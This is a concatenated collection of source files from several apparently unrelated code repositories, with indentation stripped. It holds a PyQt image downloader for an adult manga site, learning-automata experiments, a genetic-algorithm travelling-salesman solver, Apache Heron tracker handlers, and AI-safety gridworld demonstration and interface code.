self.changeDirectory = QtWidgets.QPushButton(self.changeDirectoryFrame)
self.changeDirectory.setGeometry(QtCore.QRect(0, 0, 351, 41))
font = UNIVERSAL_FONT#deepcopy(UNIVERSAL_FONT)#QtGui.QFont()
#font.setFamily("Sans Serif")
font.setPointSize(20)
font.setBold(True)
font.setWeight(75)
font.setStyleStrategy(QtGui.QFont.StyleStrategy.PreferAntialias)
self.changeDirectory.setFont(font)
self.changeDirectory.setCursor(QtGui.QCursor(QtCore.Qt.CursorShape.OpenHandCursor))
self.changeDirectory.setStyleSheet("background: rgb(236,40,84); \n"
"color: rgb(255,255,255);")
self.changeDirectory.setObjectName("changeDirectory")
self.progressionBar = QtWidgets.QProgressBar(Form)
self.progressionBar.setGeometry(QtCore.QRect(40, 510, 351, 81))
self.progressionBar.setLayoutDirection(QtCore.Qt.LayoutDirection.LeftToRight)
self.progressionBar.setStyleSheet("QProgressBar::chunk {\n"
" background-color: rgb(236,40,84); \n"
" color:rgba(220,220,210,190)\n"
"};\n"
"")
self.progressionBar.setProperty("value", 0)
self.progressionBar.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)
self.progressionBar.setOrientation(QtCore.Qt.Orientation.Vertical)
self.progressionBar.setInvertedAppearance(False)
self.progressionBar.setTextDirection(QtWidgets.QProgressBar.Direction.TopToBottom)
self.progressionBar.setObjectName("progressionBar")
self.labelStatus = QtWidgets.QLabel(Form)
self.labelStatus.setGeometry(QtCore.QRect(40, 460, 270, 41))
font = UNIVERSAL_FONT#deepcopy(UNIVERSAL_FONT)#QtGui.QFont()
font.setPointSize(15)
font.setBold(True)
font.setWeight(75)
font.setStyleStrategy(QtGui.QFont.StyleStrategy.PreferAntialias)
self.labelStatus.setFont(font)
self.labelStatus.setStyleSheet("color: rgb(255, 255, 255);")
self.labelStatus.setTextFormat(QtCore.Qt.TextFormat.AutoText)
self.labelStatus.setAlignment(QtCore.Qt.AlignmentFlag.AlignBottom|QtCore.Qt.AlignmentFlag.AlignLeading|QtCore.Qt.AlignmentFlag.AlignLeft)
self.labelStatus.setObjectName("labelStatus")
self.BG = QtWidgets.QLabel(Form)
self.BG.setGeometry(QtCore.QRect(0, 0, 440, 679))
self.BG.setText("")
self.BG.setPixmap(QtGui.QPixmap("content/bg0.png"))
self.BG.setScaledContents(False)
self.BG.setObjectName("BG")
self.LOGO = QtWidgets.QLabel(Form)
self.LOGO.setGeometry(QtCore.QRect(40, 20, 364, 160))
self.LOGO.setText("")
self.LOGO.setPixmap(QtGui.QPixmap("content/nh0.png"))
self.LOGO.setObjectName("LOGO")
self.BG.raise_()
self.sauceBox.raise_()
self.saveDirectory.raise_()
self.labelSauce.raise_()
self.saveDirLabel.raise_()
self.downloadFrame.raise_()
self.changeDirectoryFrame.raise_()
self.progressionBar.raise_()
self.labelStatus.raise_()
self.LOGO.raise_()
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "NH"))
self.sauceBox.setPlaceholderText(_translate("Form", "177013"))
self.saveDirectory.setPlaceholderText(_translate("Form", "Select a Directory"))
self.labelSauce.setText(_translate("Form", LANG_DB[SELECTED_LANG][0]))
self.saveDirLabel.setText(_translate("Form", LANG_DB[SELECTED_LANG][1]))
self.exitButton_2.setText(_translate("Form", LANG_DB[SELECTED_LANG][7]))
self.changeDirectory.setText(_translate("Form", LANG_DB[SELECTED_LANG][2]))
self.labelStatus.setText(_translate("Form", LANG_DB[SELECTED_LANG][6]))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Form = QtWidgets.QWidget()
ui = Ui_Form()
ui.setupUi(Form)
Form.show()
sys.exit(app.exec())
```
#### File: NH-DL/src/nhentai.py
```python
import os
import math
import httpx
import asyncio
import threading
from bs4 import BeautifulSoup
from dataclasses import dataclass
from enum import (
Enum,
unique,
auto
)
from lang_db import (
SELECTED_LANG,
LANGS,
LANG_DB
)
from PyQt6.QtCore import QThread, pyqtSignal
@unique
class NH_ENUMS(Enum):
BASE_LNK = "https://nhentai.net/g/"
SUPER_BASED_LNK = "https://nhentai.net"
NH_API = "https://nhentai.net/api/gallery/"
IMG_URL = "https://i.nhentai.net/galleries/"
CONFIG = "nh.ini"
class Client(httpx.AsyncClient):
def __init__(self,*args,**kwargs):
super().__init__(*args,**kwargs)
#self.headers.update(
# {
# "User-Agent":"Mozilla/5.0 (X11; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0",
# "Connection":"Keep-Alive"
# }
#)
@staticmethod
def create_client() -> object:
headers = {"user-agent":"Mozilla/5.0 (X11; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0"}
client = Client(
headers=headers
)
return client
class Thread(threading.Thread):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def __start(self):
self.start()
def __join(self):
self.join()
@dataclass
class Progress:
percent:float=0.0
increment:float=0.0
text:str="Idling..."
@dataclass(frozen=True)
class valid_page:
lnk:str
filename:str
async def sift(_client: Client, PROG_BAR: Progress, code: str) -> valid_page:
"""BASE_NHENTAI_LINK = NH_ENUMS.BASE_LNK.value
SUPER_BASED_NHENTAI_LINK = NH_ENUMS.SUPER_BASED_LNK.value"""
PROG_BAR.text = LANG_DB[SELECTED_LANG][3]
api_lnk: str = NH_ENUMS.NH_API.value
img_lnk: str = NH_ENUMS.IMG_URL.value
#_client = Client.create_client()
# api scraper
r0 = await _client.get(api_lnk + code)
j0 = r0.json()
EXTEND = {
"j":".JPG",
"p":".PNG",
"g":".GIF"
} # LOL, IT SPELLS OUT JPG
dj_pages = j0["images"]["pages"]
try:
PROG_BAR.increment: int = 100 / len(dj_pages)
except ZeroDivisionError:
PROG_BAR.increment: int = 100
PROG_BAR.text = LANG_DB[SELECTED_LANG][8] + " 404"
TRUE_ID = str(int(j0["media_id"]))
for no, p in enumerate(dj_pages,start=1):
fn: str = "{}{}".format(str(no), EXTEND[p["t"]].lower() )
yield valid_page(
"{}{}/{}".format(img_lnk,TRUE_ID,fn),
fn
)
#await _client.aclose()
# bye bye frontend scraper !
async def download(client: Client, link:str, file_dest:str, _folder) -> None:
#print(_folder+file_dest)
with open(_folder+file_dest,'wb') as dest:
async with client.stream("GET", link) as stream_obj:
async for chnk in stream_obj.aiter_bytes(chunk_size=4096):
dest.write(chnk)
class NHentai(QThread):
progress_plus_txt_Signal = pyqtSignal(float, str)
def __init__(self, code:str, savedir:str):
super().__init__()
self.__code:str = str(code)
self.__folder = "{}/{}/".format(
str(savedir), self.__code
)
self.progressBar = Progress()
self.client = Client.create_client()
def ptEmit(self) -> None:
self.progress_plus_txt_Signal.emit(
self.progressBar.percent,
self.progressBar.text
)
def detectCloudFlare(self) -> None:
self.progressBar.text = "CHECKING FOR CLOUDFLARE..."
self.ptEmit()
test = httpx.get(
NH_ENUMS.NH_API.value + self.__code
).headers
try:
if test["server"] == "cloudflare":
self.progressBar.text = "CLOUDFLARE DETECTED"
self.ptEmit()
#await self.client.aclose()
#asyncio.run(self.client.aclose())
#return
else:
self.progressBar.text = "NO CLOUDFLARE DETECTED"
except:
pass
self.ptEmit()
def run(self) -> str:
try:
os.mkdir(path=str(self.__folder), mode=511, dir_fd=None)
except FileExistsError:
pass
#os.chdir(self.__folder)
### TEST FOR CLOUDFLARE
#self.detectCloudFlare()
###
self.progressBar.text = LANG_DB[SELECTED_LANG][3]
self.ptEmit()
asyncio.run(self.run_async())
async def run_async(self):
async for lnk in sift(self.client, self.progressBar, self.__code):
self.progressBar.text = LANG_DB[SELECTED_LANG][4]
x = await download(self.client, lnk.lnk, lnk.filename, self.__folder)
self.progressBar.percent += self.progressBar.increment
self.progressBar.percent = 100 if (self.progressBar.percent > 100) else (
self.progressBar.percent
)
#self.progressBar.percent = math.floor(self.progressBar.percent)
self.progress_plus_txt_Signal.emit(
self.progressBar.percent,
self.progressBar.text
)
self.progressBar.text = LANG_DB[SELECTED_LANG][5]
self.progressBar.percent = 100
self.progress_plus_txt_Signal.emit(
self.progressBar.percent,
self.progressBar.text
)
await self.client.aclose()
``` |
{
"source": "0xSteve/detection_learning",
"score": 3
} |
#### File: detection_learning/distest/senvironment.py
```python
import numpy as np
# from random import uniform as u
class SEnvironment(object):
'''The S-model Learning Environment.'''
def __init__(self, p_vector, precision=1):
'''Create a probability vector from the probability of
success vector.'''
self.p = np.array(p_vector)
self.precision = precision
# Only the environment knows the best xmission a priori.
# best xmission is used to evaluate a posteriori learning.
self.best_xmission = max(self.p)
def response(self, depth_index):
'''Respond to the mobile-agent the value of the timeout
probability.'''
# return self.p[depth_index] > u(0, 1)
return self.p[(depth_index - 1) * self.precision]
```
#### File: learning model implementation/one_sensor_nonstationary_lrp/mse.py
```python
import numpy as np
class MSE(object):
'''Change the learning environment in accordance with a Markovian
Switching Environment model.'''
def __init__(self, environments, time_between=0):
'''Define the number of environments and their order by passing
the environments value. Optionally, choose the time between
changing environments with the time_between variable. If the
default value is used, then environment switching is assumed to be
manual.'''
self.envs = np.array(environments)
self.time_between = 0
# The first environment is always the 0th index in the environments.
self.cur_env = 0 # This is the current environment being used.
'''Create a new instance of the MSE class.'''
# Could possibly pass number of environments as a variable.
# Could possibly pass amount of time between intervals as a variable.
def set_environments(self, environments):
'''Set the environments that are in the MSE.'''
self.envs = np.array(environments)
def get_environments(self):
'''Return the list of environments in the MSE.'''
return self.envs
def next_env(self):
'''Switch to the next environment in the MSE.'''
self.cur_env = (self.cur_env + 1) % len(self.envs)
return self.envs[self.cur_env]
def env_now(self):
'''Get the current environment.'''
return self.envs[self.cur_env]
```
#### File: learning model implementation/one_sensor_stationary_dlri/discretized_lri.py
```python
from random import uniform
import helpers as h
import numpy as np
class DLRI(object):
def __init__(self, num_actions):
self.p = np.array(h.make_dp(num_actions))
self.best = 2 * num_actions # Best time-cost.
def next_action(self):
randy = uniform(0, 1) # Throwback to Archer.
index = 0 # Worst case select the first action.
# print("The p is: " + str(self.p))
probs = self.p / sum(self.p)
cdf = h.cdf(probs)
# print("The cdf is: " + str(cdf))
index = h.get_index(randy, cdf)
return index
def do_reward(self, action):
self.p[action] += np.count_nonzero(self.p)
self.p = h.subtract_nonzero(self.p, 1)
def do_penalty(self):
pass
```
#### File: learning model implementation/one_sensor_stationary_lri/environment.py
```python
import helpers as h
import numpy as np
class Environment(object):
'''The Environment in which learning occurs.'''
def __init__(self, num_actions):
self.c = np.array(h.make_p(num_actions))
self.best = 10 * num_actions # Always worse than the worst time.
def response(self, m, request):
is_reward = self.reward_function(m, request)
if(not is_reward):
self.c += 1
self.c[m] -= 1
self.c = self.c / sum(self.c)
return is_reward
def reward_function(self, m, req):
'''The reward function is the heart and soul of this problem.'''
# The reward function needs to be good, otherwise learning does
# not happen.
if(m == req):
return 0
return 1
```
#### File: detection_learning/S_Model/experiment.py
```python
from agent import Agent
from senvironment import SEnvironment
import numpy as np
class Experiment(object):
def __init__(self, depth, channel_depth, p_vector, precision=1,
isNS=False):
self.agent = Agent(precision, depth, channel_depth)
self.max = 10000
self.start = 0
if(not isNS):
self.environment = SEnvironment(p_vector)
self.dist_est = np.zeros(int(len(p_vector) / precision))
self.learned_best = np.zeros(int(len(p_vector) / precision))
self.action1_p = np.zeros(self.max - self.start)
self.action0_p = np.zeros(self.max - self.start)
self.action2_p = np.zeros(self.max - self.start)
else:
self.environment = [SEnvironment(p_vector[0]),
SEnvironment(p_vector[1])]
self.dist_est = np.zeros(int(len(p_vector[0]) / precision))
self.learned_best = np.zeros(int(len(p_vector[0]) / precision))
self.action1_p = [np.zeros(self.max - self.start), np.zeros(self.max - self.start)]
self.action0_p = [np.zeros(self.max - self.start), np.zeros(self.max - self.start)]
self.action2_p = [np.zeros(self.max - self.start), np.zeros(self.max - self.start)]
# The learned best depth is the index. Stored in the index is the
# confidence that the index is the best.
# I need a metric to attest to the increase rate of entering the do-
# nothing state. To achieve this, I will append the probability of
# choosing this action as I approach the end of the ensemble. In this
# way we can see that the ergodic LA will tend towards this action as
# it encounters the maximum.
def evaluate(self):
self.agent.move()
self.agent.receive(self.environment.response(self.agent.send()))
self.agent.next_action()
def evaluate_ns(self, env_index):
self.agent.move()
self.agent.receive(
self.environment[env_index].response(
self.agent.send()))
self.agent.next_action()
def ensemble_evaluation(self, number_iterations):
for i in range(number_iterations):
count = 0
data_counter = 0
self.agent.lrp.reset_actions()
# print(self.agent.depth)
while(count < self.max): # and count < 1000000
if(count >= self.start):
# print("count is: " + str(count) +
# ", p = " + str(self.agent.lrp.p))
# time.sleep(1)
self.action1_p[data_counter] += self.agent.lrp.p[1]
self.action0_p[data_counter] += self.agent.lrp.p[0]
self.action2_p[data_counter] += self.agent.lrp.p[2]
self.dist_est[self.agent.depth - 1] += 1
data_counter += 1
self.evaluate()
count += 1
# if(max(self.agent.lrp.p) > 0.90):
if(max(self.agent.lrp.p) > 0.98 and
count == self.max - 1):
# print("BOOOM DONE!!")
# print("************************************")
self.learned_best[self.agent.depth - 1] += 1
# break
# self.action1_p = self.action1_p / (count - self.start)
self.learned_best = self.learned_best / number_iterations
self.dist_est = self.dist_est
self.action1_p = self.action1_p / number_iterations
self.action0_p = self.action0_p / number_iterations
self.action2_p = self.action2_p / number_iterations
def ensemble_evaluation_ns(self, number_iterations):
for k in range(len(self.environment)):
for i in range(number_iterations):
count = 0
data_counter = 0
self.agent.lrp.reset_actions()
# print(self.agent.depth)
while(count < self.max): # and count < 1000000
if(count >= self.start):
# print("count is: " + str(count) +
# ", p = " + str(self.agent.lrp.p))
# time.sleep(1)
self.action1_p[k][data_counter] += self.agent.lrp.p[1]
self.action0_p[k][data_counter] += self.agent.lrp.p[0]
self.action2_p[k][data_counter] += self.agent.lrp.p[2]
self.dist_est[self.agent.depth - 1] += 1
data_counter += 1
self.evaluate_ns(k)
count += 1
# if(max(self.agent.lrp.p) > 0.90):
if(max(self.agent.lrp.p) > 0.98 and
count == self.max - 1):
# print("BOOOM DONE!!")
# print("************************************")
self.learned_best[self.agent.depth - 1] += 1
# break
# self.action1_p = self.action1_p / (count - self.start)
self.learned_best = self.learned_best / number_iterations
self.dist_est = self.dist_est
self.action1_p[k] = self.action1_p[k] / (number_iterations)
self.action0_p[k] = self.action0_p[k] / (number_iterations)
self.action2_p[k] = self.action2_p[k] / (number_iterations)
``` |
{
"source": "0xSteve/tsp_ga",
"score": 3
} |
#### File: 0xSteve/tsp_ga/parser.py
```python
__author__ = "<NAME>"
__version__ = "0.0.1"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Development"
class Parser(object):
'''A parser class for .tsp files.'''
def __init__(self, filename):
'''create an instance of the parser with a file to read.'''
self.city_coords = {}
self.city_tour_init = []
self.city_tour_tuples = []
self.filename = filename
self.display_status = ''
# Discard the file after parsing...
content = self.read_filename(filename)
self.dimension = self.get_dimension(content)
self.edge_weight_type = self.get_edge_weight_type(content)
self.city_coords = self.get_city_coord(content)
self.city_tour_init = self.create_initial_tour()
self.city_tour_tuples = self.create_initial_coord_tuples()
def read_filename(self, filename):
'''Line-by-line read of the .tsp file.'''
with open(self.filename) as f:
self.content = f.read().splitlines()
self.display_status = 'file_loaded'
return self.content
def get_dimension(self, content):
'''Find the DIMENSION line and get the dimension.'''
for l in self.content:
if l.startswith("DIMENSION"):
index, space, rest = l.partition(':')
return rest.strip()
def get_edge_weight_type(self, content):
"""
Check for TSP type and return it (GEO, EUC_2D)
"""
for l in self.content:
if l.startswith("EDGE_WEIGHT_TYPE"):
index, space, rest = l.partition(':')
return rest.strip()
def get_city_coord(self, content):
start = self.content.index("NODE_COORD_SECTION")
end = self.content.index("EOF")
# use line instead of l, linter complaint...
for line in self.content[start + 1:end]:
line = line.strip()
city, space, coord = line.partition(" ")
coord = coord.strip()
x, space, y = coord.partition(" ")
self.city_coords[int(city)] = (x.strip(), y.strip())
return self.city_coords
def create_initial_tour(self):
for i in range(1, int(self.dimension) + 1):
self.city_tour_init.append(i)
return self.city_tour_init
def create_initial_coord_tuples(self):
city_tour_init = self.city_tour_init
content = self.city_coords
for i in city_tour_init:
self.city_tour_tuples.append(content.get(i))
return self.city_tour_tuples
```
#### File: 0xSteve/tsp_ga/tsp.py
```python
__author__ = "<NAME>"
__version__ = "0.0.1"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Development"
import array
import random
import numpy
from deap import algorithms
from deap import base
from deap import creator
from deap import tools
# Import my TSP stuff
from distance import *
from parser import *
# Create a new TSP
eil51 = Parser("eil51.tsp")
citylist = eil51.city_coords
# print(len(citylist))
# citylist = zip(citylist.get(1)[:-1], citylist.get(1)[1:])
# for u, v in citylist:
# print(u)
# print(v)
tours = TSPDistance(eil51.city_tour_init, eil51.city_coords)
distance_map = tours.distance_map
IND_SIZE = int(eil51.dimension)
creator.create("FitnessMin", base.Fitness, weights=(-1.0,))
creator.create("Individual", array.array, typecode='i',
fitness=creator.FitnessMin)
creator.create("FitnessMin", base.Fitness, weights=(-1.0,))
creator.create("Individual", array.array, typecode='i',
fitness=creator.FitnessMin)
toolbox = base.Toolbox()
# Attribute generator
toolbox.register("indices", random.sample, range(IND_SIZE), IND_SIZE)
# Structure initializers
toolbox.register("individual", tools.initIterate, creator.Individual,
toolbox.indices)
toolbox.register("population", tools.initRepeat, list, toolbox.individual)
def evalTSP(individual):
distance = distance_map[individual[-1]][individual[0]]
for gene1, gene2 in zip(individual[0:-1], individual[1:]):
distance += distance_map[gene1][gene2]
return distance,
toolbox.register("mate", tools.cxPartialyMatched)
toolbox.register("mutate", tools.mutShuffleIndexes, indpb=0.05)
toolbox.register("select", tools.selTournament, tournsize=3)
toolbox.register("evaluate", evalTSP)
def main():
random.seed(169)
pop = toolbox.population(n=100000)
hof = tools.HallOfFame(1)
stats = tools.Statistics(lambda ind: ind.fitness.values)
stats.register("avg_dist", numpy.mean)
stats.register("std", numpy.std)
stats.register("min_dist", numpy.min)
stats.register("max_dist", numpy.max)
algorithms.eaSimple(pop, toolbox, 0.7, 0.2, 1000, stats=stats,
halloffame=hof)
print('')
return pop, stats, hof
if __name__ == "__main__":
main()
``` |
{
"source": "0xStormEye/incubator-heron",
"score": 2
} |
#### File: python/handlers/clustershandler.py
```python
import tornado.gen
from heron.tools.tracker.src.python.handlers import BaseHandler
# pylint: disable=attribute-defined-outside-init
class ClustersHandler(BaseHandler):
"""
URL - /clusters
The response JSON is a list of clusters
"""
def initialize(self, tracker):
""" initialize """
self.tracker = tracker
@tornado.gen.coroutine
def get(self):
""" get method """
clusters = [statemgr.name for statemgr in self.tracker.state_managers]
self.write_success_response(clusters)
```
#### File: src/python/main.py
```python
import logging
import os
import signal
import sys
import tornado.httpserver
import tornado.ioloop
import tornado.web
from tornado.options import define
from tornado.httpclient import AsyncHTTPClient
from heron.tools.common.src.python.utils import config as common_config
from heron.common.src.python.utils import log
from heron.tools.tracker.src.python import constants
from heron.tools.tracker.src.python import handlers
from heron.tools.tracker.src.python import utils
from heron.tools.tracker.src.python.config import Config, STATEMGRS_KEY
from heron.tools.tracker.src.python.tracker import Tracker
import click
Log = log.Log
class Application(tornado.web.Application):
""" Tornado server application """
def __init__(self, config):
AsyncHTTPClient.configure(None, defaults=dict(request_timeout=120.0))
self.tracker = Tracker(config)
self.tracker.synch_topologies()
tornadoHandlers = [
(r"/", handlers.MainHandler),
(r"/clusters", handlers.ClustersHandler, {"tracker":self.tracker}),
(r"/topologies", handlers.TopologiesHandler, {"tracker":self.tracker}),
(r"/topologies/states", handlers.StatesHandler, {"tracker":self.tracker}),
(r"/topologies/info", handlers.TopologyHandler, {"tracker":self.tracker}),
(r"/topologies/logicalplan", handlers.LogicalPlanHandler, {"tracker":self.tracker}),
(r"/topologies/config", handlers.TopologyConfigHandler, {"tracker":self.tracker}),
(r"/topologies/containerfiledata", handlers.ContainerFileDataHandler,
{"tracker":self.tracker}),
(r"/topologies/containerfiledownload", handlers.ContainerFileDownloadHandler,
{"tracker":self.tracker}),
(r"/topologies/containerfilestats",
handlers.ContainerFileStatsHandler, {"tracker":self.tracker}),
(r"/topologies/physicalplan", handlers.PhysicalPlanHandler, {"tracker":self.tracker}),
(r"/topologies/packingplan", handlers.PackingPlanHandler, {"tracker":self.tracker}),
# Deprecated. See https://github.com/apache/incubator-heron/issues/1754
(r"/topologies/executionstate", handlers.ExecutionStateHandler, {"tracker":self.tracker}),
(r"/topologies/schedulerlocation", handlers.SchedulerLocationHandler,
{"tracker":self.tracker}),
(r"/topologies/metadata", handlers.MetaDataHandler, {"tracker":self.tracker}),
(r"/topologies/runtimestate", handlers.RuntimeStateHandler, {"tracker":self.tracker}),
(r"/topologies/metrics", handlers.MetricsHandler, {"tracker":self.tracker}),
(r"/topologies/metricstimeline", handlers.MetricsTimelineHandler, {"tracker":self.tracker}),
(r"/topologies/metricsquery", handlers.MetricsQueryHandler, {"tracker":self.tracker}),
(r"/topologies/exceptions", handlers.ExceptionHandler, {"tracker":self.tracker}),
(r"/topologies/exceptionsummary", handlers.ExceptionSummaryHandler,
{"tracker":self.tracker}),
(r"/machines", handlers.MachinesHandler, {"tracker":self.tracker}),
(r"/topologies/pid", handlers.PidHandler, {"tracker":self.tracker}),
(r"/topologies/jstack", handlers.JstackHandler, {"tracker":self.tracker}),
(r"/topologies/jmap", handlers.JmapHandler, {"tracker":self.tracker}),
(r"/topologies/histo", handlers.MemoryHistogramHandler, {"tracker":self.tracker}),
(r"(.*)", handlers.DefaultHandler),
]
settings = dict(
debug=True,
serve_traceback=True,
static_path=os.path.dirname(__file__)
)
tornado.web.Application.__init__(self, tornadoHandlers, **settings)
Log.info("Tracker has started")
def stop(self):
self.tracker.stop_sync()
def define_options(port: int, config_file: str) -> None:
""" define Tornado global variables """
define("port", default=port)
define("config_file", default=config_file)
def create_tracker_config(config_file: str, stmgr_override: dict) -> dict:
# try to parse the config file if we find one
config = utils.parse_config_file(config_file)
if config is None:
Log.debug(f"Config file does not exists: {config_file}")
config = {STATEMGRS_KEY:[{}]}
# update non-null options
config[STATEMGRS_KEY][0].update(
(k, v)
for k, v in stmgr_override.items()
if v is not None
)
return config
def show_version(_, __, value):
if value:
common_config.print_build_info()
sys.exit(0)
@click.command()
@click.option(
"--version",
is_flag=True,
is_eager=True,
expose_value=False,
callback=show_version,
)
@click.option('--verbose', is_flag=True)
@click.option(
'--config-file',
help="path to a tracker config file",
default=os.path.join(utils.get_heron_tracker_conf_dir(), constants.DEFAULT_CONFIG_FILE),
show_default=True,
)
@click.option(
'--port',
type=int,
default=constants.DEFAULT_PORT,
show_default=True,
help="local port to serve on",
)
@click.option(
'--type',
"stmgr_type",
help=f"statemanager type e.g. {constants.DEFAULT_STATE_MANAGER_TYPE}",
type=click.Choice(choices=["file", "zookeeper"]),
)
@click.option(
'--name',
help=f"statemanager name e.g. {constants.DEFAULT_STATE_MANAGER_NAME}",
)
@click.option(
'--rootpath',
help=f"statemanager rootpath e.g. {constants.DEFAULT_STATE_MANAGER_ROOTPATH}",
)
@click.option(
'--tunnelhost',
help=f"statemanager tunnelhost e.g. {constants.DEFAULT_STATE_MANAGER_TUNNELHOST}",
)
@click.option(
'--hostport',
help=f"statemanager hostport e.g. {constants.DEFAULT_STATE_MANAGER_HOSTPORT}",
)
def cli(
config_file: str,
stmgr_type: str,
name: str,
rootpath: str,
tunnelhost: str,
hostport: str,
port: int,
verbose: bool,
) -> None:
"""
A HTTP service for serving data about clusters.
The statemanager's config from the given config file can be overrided using
options on this executable.
"""
log.configure(logging.DEBUG if verbose else logging.INFO)
# set Tornado global option
define_options(port, config_file)
stmgr_override = {
"type": stmgr_type,
"name": name,
"rootpath": rootpath,
"tunnelhost": tunnelhost,
"hostport": hostport,
}
config = Config(create_tracker_config(config_file, stmgr_override))
# create Tornado application
application = Application(config)
# pylint: disable=unused-argument
# SIGINT handler:
# 1. stop all the running zkstatemanager and filestatemanagers
# 2. stop the Tornado IO loop
def signal_handler(signum, frame):
# start a new line after ^C character because this looks nice
print('\n', end='')
application.stop()
tornado.ioloop.IOLoop.instance().stop()
# associate SIGINT and SIGTERM with a handler
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
Log.info("Running on port: %d", port)
if config_file:
Log.info("Using config file: %s", config_file)
Log.info(f"Using state manager:\n{config}")
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(port)
tornado.ioloop.IOLoop.instance().start()
if __name__ == "__main__":
cli() # pylint: disable=no-value-for-parameter
``` |
{
"source": "0xsuu/ai-safety-gridworlds",
"score": 2
} |
#### File: ai_safety_gridworlds/demonstrations/demonstrations.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from ai_safety_gridworlds.environments.shared.safety_game import Actions
# Demonstration data is stored as a named tuple.
Demonstration = collections.namedtuple('Demonstration',
['seed', 'actions', 'episode_return',
'safety_performance', 'terminates'])
# Dictionary containing the demonstration data. It's a mapping from environment
# name to a list of demonstrations.
_demonstrations = {
'boat_race': [Demonstration(0, 'rrddlluu'*12 + 'rrdd', 50, 100, True)],
'conveyor_belt': [Demonstration(0, 'dduu', 50, 50, False)], # Vase variant.
'distributional_shift': [Demonstration(0, 'ddrrrrrruu', 40, 40, True)],
'island_navigation': [Demonstration(0, 'dddl', 46, 46, True),
Demonstration(0, 'dldd', 46, 46, True),
Demonstration(0, 'ddld', 46, 46, True),
Demonstration(0, 'lddd', 46, 46, True)],
'safe_interruptibility': [Demonstration(17, 'dllllldd', 42, 42.0, True),
Demonstration(17, 'ddduullllldd', 38, 38.0, True),
Demonstration(33, 'd'+'l'*99, -100, 0.0, True),
Demonstration(33, 'ddduullllldd', 38, 0.0, True)],
'whisky_gold': [Demonstration(0, 'drrrru', 44, 44, True)],
'side_effects_sokoban': [Demonstration(0, 'ldrdrrulddr', 39, 39, True),
Demonstration(0, 'ldrdrrulrdd', 39, 39, True)],
}
# Dictionary for translating the human-readable actions into actual actions.
_actions = {'l': Actions.LEFT,
'r': Actions.RIGHT,
'u': Actions.UP,
'd': Actions.DOWN,
'q': Actions.QUIT}
def get_demonstrations(environment):
"""Returns a list of action sequences demonstrating good behavior.
Args:
environment: name of the environment.
Returns:
A list of `Demonstration`s. Each `Demonstration` is a named tuple with
a random seed, a sequence of `Actions`, a episode return, and a safety
performance score.
Raises:
ValueError: No demonstrations exist for this environment.
"""
if environment not in _demonstrations:
raise ValueError(
'No demonstrations for environment \'{}\'.'.format(environment))
def preprocess(demo):
"""Preprocessing turns the action strings into actual action sequences."""
return Demonstration(demo.seed, [_actions[c] for c in demo.actions],
demo.episode_return, demo.safety_performance,
demo.terminates)
return [preprocess(demo) for demo in _demonstrations[environment]]
def environment_names():
"""A set of the names of all environments with demonstrations."""
return set(_demonstrations.keys())
```
#### File: shared/rl/pycolab_interface.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from ai_safety_gridworlds.environments.shared.rl import array_spec as specs
from ai_safety_gridworlds.environments.shared.rl import environment
class Environment(object):
"""A generic Python interface for pycolab games."""
def __init__(self, game_factory, discrete_actions, default_reward,
observation_distiller, continuous_actions=None,
max_iterations=float('inf')):
"""Construct a `Base` adapter that wraps a pycolab game.
For each episode, a new pycolab game is supplied by the `game_factory`
argument. The structure of games' rewards is restricted to scalar values,
while actions passed to the games are either scalar values as well or
concatenated flat lists of scalar values. The structure of the
`discrete_actions` and `continuous_actions` determines the structure of the
actions received by the game as follows:
| `discrete_actions` is | `continuous_actions` is | action is |
|------------------------|-------------------------|-----------------------|
| a `(min, max)` 2-tuple | `None` | a scalar |
| `None` | a `(min, max)` 2-tuple | a scalar |
|------------------------|-------------------------|-----------------------|
| a list of N 2-tuples | `None` | a list of N scalars |
| `None` | a list of N 2-tuples | a list of N scalars |
|------------------------|-------------------------|-----------------------|
| a list of N 2-tuples | a `(min, max)` 2-tuple | a list of N+1 scalars |
| a `(min, max)` 2-tuple | a list of N 2-tuples | a list of N+1 scalars |
|------------------------|-------------------------|-----------------------|
| a `(min, max)` 2-tuple | a `(min, max)` 2-tuple | a list of 2 scalars |
| a list of N 2-tuples | a list of M 2-tuples | a list of N+M scalars |
Here, a scalar action may be an int or float as appropriate, or a numpy
array with a single element.
Whenever there are arrays containing both discrete and continuous actions,
the discrete actions always precede the continuous ones.
The format of your observations depends on the value returned by your
`observation_distiller`. If a numpy array, then the observations will be a
dict whose single entry, `'board'`, is that array. Otherwise, your distiller
should return a dict mapping string names to numpy arrays whose dimensions
and contents are of your choosing.
If a game ever terminates, the episode is considered terminated. The game
underway will be discarded and a new game built by the `game_factory`.
Args:
game_factory: a callable that returns a fully-constructed pycolab
game engine. The `its_showtime` method should not have been called yet
on the returned games. For most predictable results, this callable
should be stateless.
discrete_actions: a `(min, max)` tuple or a list of such tuples, or `None`
if the game does not use discrete actions. See discussion above.
default_reward: a reward to return to clients of this `environment.Base`
adapter when (or if) the game issues a reward of None. Should probably
be a scalar (0.0 is a typical choice); should definitely have the same
dimensions and type as the non-None rewards returned by `game_factory`
games.
observation_distiller: a callable that takes the `rendering.Observation`s
generated by `game_factory`-returned game engines and converts them
into numpy arrays (or dicts of numpy arrays). The `Distiller` class
in this module documents further requirements for this argument and
provides a common idiom that may be adequate for many use cases.
continuous_actions: a `(min, max)` tuple or a list of such tuples, or
`None` if the game does not use continuous actions. See discussion
above.
max_iterations: the maximum number of game iterations that an episode may
last before it gets terminated. By default, this is unlimited, but if
specified it prevents games from going on forever.
Raises:
TypeError: the game returned by `game_factory` appears to have a reward
type that doesn't match the type of the `default_reward` value. This
check is not particularly rigorous (it won't descend into lists,
and can't do the check if the game returns a reward of `None` on the
`its_showtime` call).
ValueError: `discrete_actions` and `continuous_actions` were both `None`
or empty lists.
"""
